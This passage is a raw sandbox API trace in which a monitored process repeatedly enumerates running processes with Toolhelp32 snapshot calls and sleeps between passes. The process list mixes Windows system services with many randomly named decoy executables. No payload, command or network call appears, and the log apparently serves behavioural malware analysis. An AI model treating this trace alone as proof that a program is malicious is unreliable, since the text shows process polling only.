[0104.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="proudlydocumented.exe")) returned 1 [0104.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0104.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0104.840] CloseHandle (hObject=0xbc) returned 1 [0104.840] Sleep (dwMilliseconds=0x12c) [0105.140] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.145] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.170] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.216] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
[0105.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.229] CloseHandle (hObject=0xc4) returned 1 [0105.229] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.235] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.246] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.247] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.294] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.295] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, 
